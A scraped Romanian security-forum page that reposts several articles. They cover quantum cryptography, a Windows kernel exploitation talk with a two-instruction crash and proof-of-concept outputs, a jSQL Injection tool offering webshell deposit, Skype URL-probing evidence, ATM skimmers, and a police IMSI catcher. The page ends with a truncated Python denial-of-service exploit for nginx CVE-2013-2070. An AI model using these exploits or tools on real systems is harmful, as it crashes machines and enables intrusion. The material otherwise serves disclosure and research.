lot of the agency’s scientific investigations are carried out. A third project, organised by Jane Nordholt of Los Alamos National Laboratory, has just demonstrated how a pocket-sized QKD transmitter called the QKarD can secure signals sent over public data networks to control smart electricity grids. Smart grids balance demand and supply so that electricity can be distributed more efficiently. This requires constant monitoring of the voltage, current and frequency of the grid in lots of different places—and the rapid transmission of the results to control centres. That transmission, however, also needs to be secure in case someone malicious wants to bring the system down. In their different ways, all these projects are ambitious. All, though, rely on local fixed lines to carry the photons. Other groups of researchers are thinking more globally. To do that means sending quantum-secured data to and from satellites. At least three groups are working on this: Thomas Jennewein and his team at the Institute for Quantum Computing in Waterloo, Canada; a collaboration led by Anton Zeilinger at the University of Vienna and Jian-Wei Pan at the University of Science and Technology of China; and Alex Ling and Artur Ekert at the Centre for Quantum Technologies in Singapore. Dr Jennewein’s proposal is for Alice to beam polarisation-encoded photons to a satellite. Once she has established a key, Bob, on another continent, will wait until the satellite passes over him so he can send some more photons to it to create a second key. The satellite will then mix the keys together and transmit the result to Bob, who can work out the first key because he has the second. Alice and Bob now possess a shared key, so they can communicate securely by normal (less intellectually exhausting) terrestrial networks. Dr Jennewein plans to test the idea, using an aircraft rather than a satellite, at some point during the next 12 months. An alternative, but more involved, satellite method is to use entangled photon pairs. Both Dr Zeilinger’s and Dr Ling’s teams have been trying this. Entanglement is a quantum effect that connects photons intimately, even when they are separated by a large distance. Measure one particle and you know the state of its partner. In this way Alice and Bob can share a key made of entangled photon pairs generated on a satellite. Dr Zeilinger hopes to try this with a QKD transmitter based on the International Space Station. He and his team have been experimenting with entanglement at ground level for several years. In 2007 they sent entangled photon pairs 144km through the air across the Canary Islands. Dr Ling’s device will test entanglement in orbit, but not send photons down to Earth. If this sort of thing works at scale, it should keep Alice and Bob ahead for years. As for poor Eve, she will find herself entangled in an unbreakable quantum web. Sursa: Cryptography: The solace of quantum | The Economist

[h=2]NoSuchCon’13 and crashing Windows with two instructions[/h]The first edition of the NoSuchCon security conference held in Paris ended just a few days ago. Before anything else, I would like to thank all of the organizers (proudly listed at nosuchcon.org) for making the event such a blast! Both the location, venue and speaker line-up were amazing, with lots of free beer and wealth of people to chat with. Overall, I am very happy to have shown up there and I will definitely make sure to attend the second edition of the conference. Other than drinking, discussing 0-days and visiting Paris, I also had the pleasure to give a talk about the usual subject – Windows kernel security. The exact title of my presentation was “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions“, and touched on the subject of several different exploitation techniques, internal CPU related behavior and security vulnerabilities (all related to the Windows operating system) that I discovered during the course of last several weeks / months. While the slide deck was made available to the attendees right at the beginning of my talk at nosuchcon.org/talks (great idea!), I’m reposting them here anyway, in case you haven’t had a chance to take a look yet. In fact, a majority of the talks were interesting and highly technical, so be sure to check the available material for all presentations ;-) Download Slides: “Abusing the Windows Kernel: How to Crash an Operating System With Two Instructions” (3.3MB, PDF) KiTrap0e advisory: “Abusing Windows NT #PF Trap Handler to Bugcheck and Leak Information” I originally planned to address six separate topics, but due to time constraints I decided to skip some of them in favor of the other ones. A brief description of each technique and vulnerability follows below. “nt!memcpy (and the like) reverse copying order” – certain implementations of the memcpy, memmove, RtlCopyMemory and RtlMoveMemory found in the kernel and third-party drivers alike handle the “overlapping regions” corner case by reversing the copy process order from the intuitive left-to-right to right-to-left direction. By starting to write at the end of the destination memory region, the functions facilitate successful exploitation of certain buffer overflow vulnerabilities, by allowing a (relative) write-what-where condition to be provoked. . While the technique works best for a kernel ? user copy on 64-bit platforms, it can also be applied to a number of other scenarios. For more information, please refer to the “Memory Copy Functions in Local Windows Kernel Exploitation” article published last year in the Hack in the Box Magazine, Issue 009. The Proof of Concept source code of a vulnerable device driver and an exploit used during live demonstration can be found at memcpy_ioctl.zip (3.9kB, ZIP). Note that the code has only been confirmed to be suspectible to a stack cookie bypass when built with WDK 7600.16385.1 for Windows 7 (x64 Free Build), although it should generally work for any 64-bit target. . “nt!memcmp double-fetch” – an interesting behavior found in the Windows 8 32-bit implementation of the nt!memcmp standard function, making it possible to fake matching regions when a user-mode pointer is passed as one of the function’s parameters. Due to lack of time, this was not covered at NSC; however, our SyScan’13 slides and paper explain the problem thoroughly. . “PAGE_GUARD and kernel code execution flow” – a technique already described in the “Fun facts: Windows kernel and guard pages” and “A story of win32k!cCapString, or unicode strings gone bad.” blog posts. . “SegSs, LDT_ENTRY.HighWord.Bits.Default_Big and IRETD” – due to how the “Big“ LDT entry flag in the SS: segment descriptor is handled by the IRETD instruction used for cross-privilege-level transfers in Windows, it is possible to have the CPU disclose the upper 16 bits of the current thread’s kernel stack pointer in 32-bit versions of Windows. . Proof of Concept source code: small_seg.zip (1kB, ZIP). . Example output: Z:\>smallseg.exe [+] High word of kernel stack address: 94070000 Z:\>smallseg.exe [+] High word of kernel stack address: 94010000 Z:\>smallseg.exe [+] High word of kernel stack address: 956b0000 “Windows 32-bit Trap Handlers” – the lack of proper sanitization of the previous CPL inside several trap handlers used in 32-bit Windows can be leveraged to disclose addresses of several internal ntoskrnl.exe (or equivalent) symbols in the kernel address space, effectively defeating kernel ASLR (not that it matters much for this particular OS). . Proof of Concept source code: kitrap01.zip (1.3kB, ZIP) and kitrap0e_addr.zip (1.4kB, ZIP). . Example outputs: Z:\>kitrap01.exe [+] Kernel image base: 8320c000, size: 413000 [+] Iteration 3d000 / 413000 [+] nt!KiFastCallEntry address: 83249790 Z:\>kitrap0e.exe [+] Kernel image base: 8320c000, size: 413000 [+] Iteration 3d000 / 413000 [+] Leaked address: 8324984c [+] Leaked address: 83249887 [+] Iteration 41000 / 413000 [+] Leaked address: 8324d4ed [+] Iteration 412000 / 413000 “Crashing Windows and leaking bits” – the primary focus area of the overall talk. As it turns out, the nt!KiTrap0e #PF trap handler trusts the KTRAP_FRAME.Ebp field to be a valid kernel-mode pointer when processing faults occuring at a specific, magic Eip values. Again, due to lack of proper KTRAP_FRAME.SegCs sanitization, it is possible to craft a frame with controlled Eip and the user-mode Ebp register, allowing a local attacker to crash the system via an invalid memory reference, or otherwise disclose the least significant bit of any byte in the kernel address space.The two instructions capable of crashing all 32-bit Windows NT-family systems as of today are as follows: [h=1]xor ebp, ebp[/h] [h=1]jmp 0x8327d1b7[/h] where 0x8327d1b7 is the nt!KiSystemServiceAccessTeb address. Proof of Concept source code: kitrap0e_bsod.zip (0.5kB, ZIP), kitrap0e_leak_bits.zip (1.4kB, ZIP) and kitrap0e_addr_space.zip (1.5kB, ZIP). The programs unconditionally crash the operating system, allow disclosing specific bits of the kernel memory and scan the kernel address space layout, respectively. Sursa: NoSuchCon’13 and crashing Windows with two instructions | j00ru//vx tech blog

Mi-as pula-n ofertele voastre.

Geniilor: https://rstforums.com/forum/external.php?type=RSS2&forumids=59

Sa vedem ce o sa iasa... Sa va vad: https://rstforums.com/forum/oferte.rst

[h=1]jSQL Injection v-0.4 : a java tool for automatic database injection[/h] May 21, 2013 · by Terry Update jSQL Injection v-0.4 : a java tool for automatic database injection. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic best algorithm selection Multi-thread control (start/pause/resume/stop) Progression bars Shows URL calls Simple evasion Proxy setting Distant file reading Webshell deposit Terminal for webshell commands Configuration backup Update checker Admin page checker Brute forcer (md5 mysql…) Coder (encode decode base64 hex md5…) Supports MySQL jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris). Next work: + distant table writing [sqli] + distant file writing [sqli] + reverse tcp shell deposit [sqli] + right elevation [sqli] + speed increase (non encoding pass): 50% faster [sqli] + control all running tasks in a tab [gui] # speed test comparison with other injection tools [dev] # automatic code testing (JUnit) [dev] # wiki pages [site] Download : jsql-injection-v0.4.jar (1.2 MB) Find Other Version | Sources : https://code.google.com/p/jsql-injection/ Our Post before : Update jSQL Injection v-0.3 : a java tool for automatic database injection. Sursa: Update jSQL Injection v-0.4 : a java tool for automatic database injection.

[h=1]Micul geniu din Hackerville care a cucerit SUA[/h] Vezi galeria foto Povestea românului care a refuzat ofertele de la Google. Toat? lumea îl ?tie pe Ionu? Budi?teanu de la televizor, din ziare sau din pove?tile despre „ce inven?ii au mai f?cut românii“. De fapt, pu*?ini îl cunosc personal, fiindc? petrece aproape 16 ore pe zi la computer, inventând programe pentru care a primit peste o sut? de premii. Nu merge în parc, nu iese la bere cu prietenii, iar ultima carte citit? a fost în clasa a doua. Nu îi pare r?u, deoarece informatica însumeaz?, pentru el, toate pasiunile posibile. Atunci când m-am întâlnit prima oar? cu Ionu?, ?tiam doar c? este un geniu – cel pu?in a?a îl descriseser? cei care îl întâlniser? pân? în acel moment. El nu spune acela?i lucru, se prezint? drept „un copil care înva?? mult“. Mai ?tiam despre el c? a inventat un program cu ajutorul c?ruia persoanele nev?z?toare reu?esc s? disting? obiecte, c? a fost curtat de cele mai mari universit??i din SUA ?i c? a impresionat jurii nenum?rate cu proiectele sale. Din mailurile schimbate înainte s? ne cunoa?tem oficial, mi-am închipuit c? este o persoan? foarte politicoas?. ?i nu m-am în?elat. Ionu? folose?te pronumele de polite?e, spune „Mul?umesc!“ cât poate de des ?i poveste?te despre proiectele lui modest, calm, dar sigur pe el. Dup? o discu?ie în care mi-a explicat cum func?ioneaz? inven?iile sale, a scos dintr-un rucsac un teanc de diplome. Cam 130. „Am adus ?i ni?te diplome de la concursurile la care am participat“, îmi spune el calm. Prima pe care am observat-o era una oferit? de Universitatea Yale. Au urmat alte câteva din Taiwan, Azerbaidjan, Olanda ?i lista continu?. Mi-a spus c? a participat de 13 ori la concursuri în str?in?tate ?i la multe altele în ?ar?. Are doar 18 ani, iar aventura concursurilor a început din clasa a V-a. Pasiunea pentru computer ?i tot ce poate face cu ajutorul lui, mult mai devreme. Ionu? a v?zut primul computer la 3 ani. P?rin?ii lui împrumutaser? cuiva o sum? de bani, pe care respectivul nu a reu?it s? o dea înapoi. În schimb, le-a oferit un Pentium 386. „Mai era un singur alt computer în tot ora?ul la vremea aceea“, glume?te el. De?i în Râmnicu-Vâlcea, ora?ul unde locuie?te ?i acum, nu existau multe astfel de aparate pe care s? înve?e cum se utilizeaz?, asta nu l-a oprit s? observe singur cum func?ioneaz?. A început s? experimenteze jocuri de toate tipurile. Î?i aminte?te c? la 4 ani ?tia s? î?i salveze singur jocul, recuno?tea cuvintele ?i comenzile care îl ajutau s? fac? asta ?i nu se dezlipea de noua juc?rie. Au urmat peste 1.000 de jocuri pe care le cump?ra de pe Internet, pân? când ?i-a dat seama c? trebuie s? treac? la urm?torul nivel. Se plictisise, iar acum voia s? inventeze jocurile, nu s? le joace. A?a c?, în clasa a III-a, a încercat s? î?i fac? propriile jocuri, documentându-se din instruc?iunile celor cunoscute, din documenta?iile aplica?iilor ?i din c?r?i de specialitate. De?i toate aceste documente nu erau în limba român?, spune relaxat c? „în?elegeam ce citeam, doar aveam sistemul de operare în englez?“. Era interesat de anima?iile 3D, iar în vremea aceea St?pânul Inelelor f?cea furori la capitolul acesta. A încercat ?i el s? creeze lucruri asem?n?toare ?i a reu?it s? realizeze explozii, personaje, îns? nu le-a putut anima. Pentru pu?in timp a crezut c? poate nu i se potrive?te ceea ce încearc? s? fac?. A continuat s? experimenteze aplica?ii, s? încerce s? înve?e cum func?ioneaz?. În timpul acesta, colegii lui de la ?coal? înv??au s? foloseasc? Microsoft Word ?i Excel, iar profesoara de informatic? îl ruga s? îi transcrie documentele, pentru c? tasta rapid. El îi ar?ta ?i ce lucra singur, îns? ea nu îl credea. Nici din clasa a V-a lucrurile nu au fost foarte simple. Înv??a un nou limbaj de programare, bazat în special pe transpunerea problemelor de matematic? distractiv? în informatic?, ceea ce îl interesa mai pu?in decât efectele 3D, anima?iile sau alte aplica?ii. Pentru a-i capta aten?ia, profesoara îi promitea c? îl ajut? s? finalizeze jocul la care lucra, dac? face ?i ce era în programa ?colar?. A acceptat, dar asta nu îl oprea ca acas? la el s? continue munca de programare. Din când în când îi mai aducea profesoarei sale câte un CD cu ce lucrase. „Dumneaei era nedumerit? cum de f?ceam eu aplica?iile ?i nu ?tiam de fapt instruc?iuni de baz?. Nu prea m? credea când vedea ce f?ceam eu“, spune el râzând. În gimnaziu, Ionu? se transformase în varianta modern? ?i tehnologizat? a personajelor de poveste, care cre?teau într-un an cât al?ii în 10. El acumula informa?ii mai rapid decât al?i colegi ?i inventa programe de zor. A început s? mearg? la concursurile na?ionale de informatic?, unde aplica ce înv??a la ?coal?, dar nu î?i p?r?sea nici pasiunile. Înv??a acas?, singur, din lucr?ri academice de informatic?, tratate sau alte lucruri neinteresante pentru copiii de vârsta lui. Nu mai ie?ise în fa?a blocului s? se joace de la nou? ani. Nu sim?ea nevoia, informatica îi ocupa timpul a?a cum îi pl?cea. „Câteodat? adormeam cu capul pe tastatur? ?i m? trezeam a doua zi diminea?a.“ „Nu te certau p?rin?ii c? stai prea mult timp la computer?“, îl întreb. „Nu m? certau. ?i-au dat seama c? eu nu m? mai jucam, dar foloseam util timpul. Computerul este un instrument pentru a face bani sau pentru a te dezvolta pe tine însu?i.“ La ?coal? începuse s? se diferen?ieze de ceilal?i colegi ai lui. Încerca s? vin? mereu cu laptopul sau cu c?r?i de specialitate în sala de clas?, pentru a nu pierde niciun moment de studiu. „Ionu? mi-a atras aten?ia pentru c? era singurul din clas? absorbit de c?r?i de informatic? în timpul pauzelor “, poveste?te profesoara sa de matematic?, Irinel Dafincescu. Ea l-a cunoscut atunci când era în clasa a VII-a. Se preg?tea pentru olimpiadele na?ionale ?i i-a cerut ajutorul profesoarei sale pentru câteva nel?muriri pe care le avea la matematic?. De atunci, Irinel Dafincescu a devenit un profesor important pentru Ionu?. Îl încuraja la fiecare concurs la care participa. „Dup? ce a venit înc?rcat cu premii interna?ionale, de o importan?? covâr?itoare, nu s-a schimbat nimic în felul lui de a fi, nu se vedea nicio urm? de arogan?? în comportamentul s?u ?i a continuat s? lucreze cu aceea?i st?ruin??“, î?i aminte?te profesoara de matematic?. În clasa a IX-a, a trecut la un nivel superior cu proiectele la care lucreaz? – a mers, pentru prima dat?, în SUA. În stilul veni, vidi, vici, a câ?tigat de la început premiul I din partea Association for Computing Machinery (ACM), cea mai mare asocia?ie ?tiin?ific? ?i academic? din domeniul Informatic?. ACM ofer? Premiul Turing, adic? versiunea Nobel pentru informatic?, la gala c?ruia Ionu? a luat unul dintre cele 12 premii oferite în acel an. Era cel mai tân?r dintre cei 12, singurul care nu avea, înc?, o carier? academic? în cercetare. Între timp s-a obi?nuit s? fie cel mai mic de la concursurile la care participa, mai ales în clasa a IX-a sau a X-a, când to?i ceilal?i erau în clasa a XII-a. Asta nu îl împiedica s? câ?tige, mai mereu, premii. „Concursurile de genul acesta au peste 1.000 de participan?i“, îmi explic? el, „iar între noi exist? respect, pentru c? ?tim cu to?ii cât am muncit“. Respectul este, dup? cum mi-a dat de în?eles, foarte important pentru Ionu?. „Nu conteaz? ce vârst? ai, conteaz? cine e?ti“, mi-a spus el odat?, când am încercat s? îl conving s? mi se adreseze la persoana a doua, singular, întrucât nu sunt cu mul?i ani mai mare decât el. Succesul din prima c?l?torie în State i-a adus o invita?ie din partea Universit??ii din San Francisco pentru a deveni studentul lor chiar de atunci, de?i era doar în clasa a noua. Ionu? nu a fost de acord. „Eram prea mic, a? fi fost prea departe de p?rin?i“, îmi spune el zâmbind. Crede c? nu ar fi trebuit s? ard? etapele ?i c? ?coala i-a fost util?. De?i se ocup? exclusiv de informatic? ?i nu mai are timp ?i pentru alte materii, îmi spune c? ?coala i-a ar?tat cum s? înve?e. ?i, dup? cum era de a?teptat, internetul îi e un bun prieten ?i pentru a înv??a, a?a c? este un perseverent autodidact, folosind cursuri online de biologie, fizic? sau alte zone de interes. Dac? la început utiliza cursuri de la masterate, acum studiaz? singur lucr?ri complicate de doctorat. Dup? premiile ?i experien?ele americane a devenit membru ACM ?i IEEE, cele mai mari asocia?ii de profil din lume. A fost premiat de Intel în repetate rânduri ?i invitat de Google Elve?ia s? lucreze pentru ei, atunci când era în clasa a XI-a, îns? i-a refuzat. „Nu vreau s? fiu unul dintre cei 7.000 de programatori care s? lucreze la fel“. Crede c? este mai util pentru umanitate dac? zece programatori ?i-ar uni for?ele s? lucreze în cercet?ri inovative. Î?i dore?te s? devin? profesor universitar, iar propunerile alternative nu îl atrag. Î?i d? seama c? entuziasmul ?i poten?ialul s?u s-ar pierde în munci birocratice sau în locuri în care mai important este marketingul decât cercetarea în informatic? sau în inteligen?? artificial?. Cel mai cunoscut ?i premiat dintre proiectele sale a fost programul care îi ajut? pe nev?z?tori s? disting? obiectele. Inspirat de unchiul s?u, care î?i pierduse vederea de mul?i ani, ?i-a dorit s? creeze un dispozitiv ieftin, prin care s? le fie de folos celor cu aceast? suferin??. Înainte de asta c?p?tase experien?? în domeniul inteligen?ei artificiale, lucrând la un encefalograf ?i citind studii nenum?rate de pe internet. ?i-a dat rapid seama c? organul care poate transmite creierului semnale în mod similar în care o fac ochii este limba. A creat, deci, un soft multifunc?ional ?i un dispozitiv care se pune pe limb?, prin care, practic, persoana nev?z?toare recunoa?te diferite obiecte. Ionu? a testat inven?ia pe unchiul s?u timp de mai multe s?pt?mâni. Cu ajutorul unei camere de filmat surprindea diferite obiecte simple. Dispozitivul proceseaz? informa?ia ?i o transmite la o matrice senzorial? plasat? pe limb?, iar aceast? matrice genereaz? un nivel de electricitate direct propor?ional cu intensitatea imaginii. Prin exerci?iu, creierul se obi?nuie?te ?i începe s? recunoasc? diferite obiecte. Dup? încerc?ri repetate, unchiul lui reu?ea s? disting? chiar ?i o mare parte dintre literele alfabetului. Înainte de acest proiect, Ionu? mai inventase un program prin care s? fie recunoscute fe?ele ho?ilor care folosesc cagule în atacurile lor, lucrase la un soft de recunoa?tere a dezastrelor naturale ?i multe alte proiecte – toate premiate în str?in?tate. De unde ideile pentru aceste lucruri? La concursurile la care particip? atât de frecvent se propun diverse teme, prin care ar putea fi ajutat? lumea. Acum lucreaz? la o ma?in? autonom?. „Adic? un autoturism care merge singur?“, întreb eu, încercând s? verific informa?ia pe care o credeam posibil? numai în filme SF. M? aprob? ?i îmi spune c? va fi a doua ma?in? de acest fel inventat? în lume. Pentru prima au lucrat o mul?ime de cercet?tori de la Stanford. Unul dintre profesorii de acolo a ?inut cursuri despre acest subiect, îns? nu a vândut marele pont, l?sându-i pe cei ca Ionu? s? inoveze. El vrea s? aduc? o îmbun?t??ire acestei ma?ini, realizând-o cu un radar mult mai ieftin decât cel folosit de americani. Acesta din urm? ar fi costat câteva zeci de mii de dolari, pe când al lui ar fi în jur de 2.000. „Vede?i Gauss-ul acesta?“, îmi indic? el, relaxat, cu degetul c?tre ecranul laptopului, unde tocmai îmi ar?ta cum func?ioneaz? mai exact softul ma?inii autonome. Încerc s? în?eleg cum poate o ma?in? s? mearg? singur?, iar r?spunsul pare destul de simplu: aceasta identific? marcajele ?i semnele rutiere, obstacolele ?i curbele ?i reu?e?te s? mearg? f?r? ca noi s? o conducem. Ca s? î?i duc? la bun sfâr?it proiectul, a primit o ma?in? de la Dacia Renault ?i „Funda?ia Dan Voiculescu“. L-am întrebat dac? are permis pentru ea. „Nu am permis, nu m? intereseaz? asta. Eu vreau s? fac o ma?in? care s? mearg? singur?“. La un moment dat, câ?iva dintre profesorii s?i au început s? se întrebe dac? nu cumva genialitatea lui poate fi periculoas?. În vremea în care el se preg?tea de inven?ii care s? ajute umanitatea, în Râmnicu-Vâlcea poli?ia aresta 30 de hackeri pentru fraude informatice grave, poveste din cauza c?reia presa american? i-a dat ora?ului numele de Hackerville. A?a c?, atunci când era în clasa a VIII-a, directorului liceului i s-a cerut s? îi interzic? accesul lui Ionu? în laboratorul de informatic?, „c?ci poate vine FBI-ul la ?coal?“, î?i aminte?te el amuzat. „Acela nu este hacking, este phishing. Este altceva“, m? l?mure?te el despre leg?tura dintre FBI ?i suspiciunile profesorilor s?i. Mi-a explicat c? hackingul înseamn?, de fapt, exploatarea vulnerabilit??ilor site-urilor, ceea ce este foarte u?or. În clasa a VI-a, a vrut s? le arate câteva probleme celor care lucrau la un site românesc, îns? ei nu l-au crezut. Ca s? le demonstreze c? a avut dreptate, a modificat câteva lucruri minore. Speria?i, au vrut s? îl dea în judecat?, îns? Ionu? nu avea pe vremea aceea nici buletin, a?a c? l-au l?sat în pace. Atunci a fost ultima dat? când a încercat ceea ce ar putea fi numit „white hat hacking“. Oamenii nu îl prea cred c? nu se ocup? cu acelea?i lucruri ca ?i acei vâlceni care au f?cut ora?ul celebru în str?in?tate. Unii profesori îi repro*?au în liceu c? programele pe care le inventeaz? nu ar fi adev?rate, c? se „autoplagiaz?“ ?i c?, de fapt, ar fi doar un mic hacker. În liceu, cineva le-a trimis profesorilor mail-uri compromi??toare, iar el a fost primul incriminat. Dar Ionu? nu ar avea timp pentru hacking. „Te-a? putea convinge s? cite?ti o poveste?“, îi propun. „Ah, nu, nu“ – râde el. Prefer? filmele, din care vede maximum 20 într-un an. Filmul preferat, care ar putea avea leg?tur? cu marea sa pasiune, este Terminator, pentru c? aduce în discu?ie nout??ile create de tehnologie în viitor. Spune c? nu î?i pierde timpul cu vizion?ri aleatorii de filme, pentru c? nu ?sta este hobby-ul lui. Unica sa pasiune este informatica, iar singurii s?i prieteni sunt tot cei care au leg?tur? cu subiectul acesta, în general cunoscu?i la concursurile interna?ionale la care merge. „Vrei s? pleci undeva în vacan?? dup? ce termini ma?ina autonom??”, îl întreb eu. Îmi spune c? îi sunt suficiente zborurile în str?in?tate pentru concursuri, acolo are parte de tot ceea ce î?i dore?te. Ultima oar? când am vorbit cu Ionu? se gr?bea s? ajung? acas?, s? mai înve?e. De?i are o burs? de 40.000 de dolari, pe care o poate folosi la orice universitate din State, prefer? s? studieze oricum, pentru c? îi place. Vrea s? mearg? la Carnegie Mellon, pentru c? simte c? i s-ar potrivi mai bine decât Yale sau Stanford. UPDATE: Pe 17 iunie, Ionu? a câ?tigat marele premiu de 75.000 de Euro International Science and Engineering Fair (ISEF), organizat de compania Intel in Arizona, SUA, pentru dezvoltarea proiectului ma?inii autonome. Foto: Ioana V?c?ra?u, Mihai D?sc?lescu Sursa: Micul geniu din Hackerville care a cucerit SUA

Vai, nu imi mai merge RST, primeste DDOS de pe 3 IP-uri

[h=1][cryptography] skype backdoor confirmation[/h]Adam Back adam at cypherspace.org Thu May 16 15:52:24 EDT 2013 So when I saw this article Skype with care – Microsoft is reading everything you write - The H Security: News and Features I was disappointed the rumoured skype backdoor is claimed to be real, and that they have evidence. The method by which they confirmed is kind of odd - not only is skype eavesdropping but its doing head requests on SSL sites that have urls pasted in the skype chat! Now I've worked with a few of the german security outfits before, though not Heise, and they are usually top-notch, so if they say its confirmed, you generally are advised to believe them. And the date on the article is a couple of days old, but I tried it anyway. Setup an non-indexed /dev/urandom generated long filename, and saved it as php with a meta-refresh to a known malware site in case thats a trigger, and a passive html with no refresh and no args. Passed a username password via ?user=foo&password=bar to the php one and sent the links to Ian Grigg who I saw was online over skype with strict instructions not to click. To my surprise I see this two entries in the apache SSL log: 65.52.100.214 - - [16/May/2013:13:14:03 -0400] "HEAD /CuArhuk2veg1owOtiTofAryib7CajVisBeb8.html HTTP/1.1" 200 - 65.52.100.214 - - [16/May/2013:14:08:52 -0400] "HEAD /CuArhuk2veg1owOtiTofAyarrUg5blettOlyurc7.php?user=foo&pass=yeahright HTTP/1.1" 200 - I was using skype on ubuntu, my Ian on the other end was using MAC OSX. It took about 45mins until the hit came so they must be batched. (The gap between the two requests is because I did some work on the web server as the SSL cert was expired and I didnt want that to prevent it working, nor something more script like with cgi arguments as in the article). Now are they just hoovering up the skype IMs via the new microsoft central server architecture having back doored skype client to no longer have end2end encrption (and feedind them through echelon or whatever) or is this the client that is reading your IMs and sending selected things to the mothership. btw their HEAD request was completely ineffective per the weak excuse microsoft offered in the article at top my php contained a meta-refresh which the head wont see as its in the html body. (Yes I confirmed via my own localhost HTTP get as web dev environments are automatic in various ways). So there is adium4skype which allows you to use OTR with your skype contacts and using skype as the transport. Or one might be more inclined to drop skype in protest. I think the spooks have been watching "Person of Interest" too much to think such things are cricket. How far does this go? Do people need to worry about microsoft IIS web servers with SSL, exchange servers? You do have to wonder if apple backdoored their IM client, below the OTR, or silent circle, or the OS - I mean how far does this go? Jon Callas said not apple, that wouldnt be cool, and apple aims for coolness for users; maybe he should dig a little more. It seems to be getting to you cant trust anything without compiling it from source, and having a good PGP WoT network with developers. A distro binary possibly isnt enough in such an environment. Adam Sursa: [cryptography] skype backdoor confirmation

[h=2]Jailed Romanian hacker repents, invents ATM security scheme[/h]Add-on device blocks card skimmers By Neil McAllister in San Francisco Posted in Security, 17th May 2013 20:33 GMT A Romanian man serving a five-year jail sentence for bank-machine fraud says he's come up with a device that can be attached to any ATM to make the machine invulnerable to card skimmers. Valentin Boanta was arrested in 2009 and charged with supplying ATM skimmers – devices that can be attached to ATMs to surreptitiously copy the data from unwitting users' cards – to a local organized crime gang. It was during his subsequent trial and sentencing that Boanta saw the light and traded in his black hat for a white one, Reuters reports. "Crime was like a drug for me. After I was caught, I was happy I escaped from this adrenaline addiction," Boanta told reporters from his jail cell in Vaslui, Romania. "So that the other part, in which I started to develop security solutions, started to emerge." Boanta's solution, known as the Secure Revolving System (SRS), is an ingenious one that uses mechanical rather than digital security. ATM skimmers work by installing a second, concealed card reader over the one that's built into the ATM. When an unsuspecting bank customer inserts a card into the slot, the card's magnetic stripe first runs past the read head of the skimmer, allowing it to copy all of the card's data. The transaction then proceeds as normal and the ATM returns the card to the customer, who is none the wiser. With Boanta's device installed on the ATM, however, that all changes. Customers insert their cards into the slot long side first, so that the magnetic stripe is parallel to the face of the machine. The device then rotates the card 90 degrees into the ATM, where the legitimate card reader scans the magnetic stripe, then rotates it back out again to return it to the customer. That rotation makes it impossible for an add-on skimmer to read the card, because the magnetic stripe never moves in a straight line until it is secure inside the ATM. While awaiting the outcome of his trial, Valentin pitched his idea to Mircea Tudor and Adrian Bizgar of Bucharest-based technology firm MB Telecom, who helped him to patent his idea and funded development of the SRS device. The design would go on to win the International Press Prize at the 41st International Exhibition of Inventions in Geneva, Switzerland, in April. Boanta, however, wasn't available to accept the award. He's currently just six months into his sentence and won't see freedom for another four and a half years. Still, his partners at MB Telecom say all credit for the SRS design should go to him. "He fully deserves such recognition," Tudor told Reuters. "He's taking part in improving Romania's image abroad and he'll surely join our team when released." MB Telecom is currently finalizing details of the commercial version of the device and expects to bring it to market in the second half of the year. ® Sursa: Jailed Romanian hacker repents, invents ATM security scheme • The Register

[h=1]Poli?ia Român? a cump?rat un sistem portabil de monitorizare a telefoanelor mobile de 2,8 milioane de lei[/h]de Adrian Dumitrache Poli?ia Român? va putea localiza, identifica ?i monitoriza telefoanele mobile în re?elele Vodafone, Orange, Cosmote ?i RCS&RDS, printr-un sistem portabil cump?rat de la firma german? SYBORG Informationssysteme cu 2,8 milioane de lei, potrivit www.e-licitatie.ro. "Sistemul folose?te metoda de simulare a unei celule reale a re?elei de telefonie mobil?. Sistemul are mobilitate total? chiar ?i în timpul func?ion?rii, având posibilitatea de instalare pe un autovehicul. Antenele utilizate în cadrul sistemului sunt ascunse vederii, fiind mascate într-un cadru portbagaj auto de plafon", se precizeaz? în caietul de sarcini al licita?iei pentru achizi?ionarea sistemului. Licita?ia a fost ini?iat? în decembrie 2012 ?i atribuit? trei luni mai târziu singurului ofertant, SYBORG Informationssysteme. Potrivit caietului de sarcini, unitatea central? a sistemului este integrat? într-o valiz? de dimensiune maxim? 60x40x30 centimetri ?i are incluse antene directive, notebook, scanner de re?ea ?i acumulatori. De asemenea, unitatea central? poate fi conectat? la antene omnidirec?ionale prin intermediul unui amplificator de re?ea. Cu ajutorul unit??ii centrale, poli?i?tii vor putea s? monitorizeze comunica?iile GSM ?i UMTS prin crearea de celule virtuale cu parametri similari cu cei ai celulelor re?elei reale. Sistemul permite modificarea puterii semnalului cu care telefoanele ?int? emit, colectarea, înregistrarea ?i memorarea într-o baz? de date a codurilor IMSI ?i IMEI, prcum ?i ora ?i data înregistr?rii. Poli?ia Român? a solicitat, prin caietul de sarcini, ?i instruirea a doi angaja?i, proces care va include 40 de ore de curs teoretice ?i practice. Sursa: Poli?ia Român? a cump?rat un sistem portabil de monitorizare a telefoanelor mobile de 2,8 milioane de lei - Gandul

nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) # Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) # Google Dork: CVE-2013-2070 # Date: 16.05.2013 # Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com # Vendor Homepage: http://nginx.org/ # Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz # Version: 1.3.9-1.4.0 # Tested on: Kali Linux & nginx v1.4.0 # CVE : CVE-2013-2070 import httplib import time import socket import sys import os # Vars & Defs debug = 0 dos_packet = 0xFFFFFFFFFFFFFFEC socket.setdefaulttimeout(1) packet = 0 def chunk(data, chunk_size): chunked = "" chunked += "%s\r\n" % (chunk_size) chunked += "%s\r\n" % (data) chunked += "0\r\n\r\n" return chunked if sys.platform == 'linux-i386' or sys.platform == 'linux2': os.system("clear") elif sys.platform == 'win32': os.system("cls") else: os.system("cls") print "======================================================================" print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) [http://www.mertsarica.com]" print "======================================================================" if len(sys.argv) < 2: print "Usage: python nginx_dos.py [target ip]\n" print "Example: python nginx_dos.py 127.0.0.1\n" sys.exit(1) else: host = sys.argv[1].lower() while packet <= 5: body = "Mert SARICA" chunk_size = hex(dos_packet + 1)[3:] chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper() if debug: print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)] try: con = httplib.HTTPConnection(host) url = 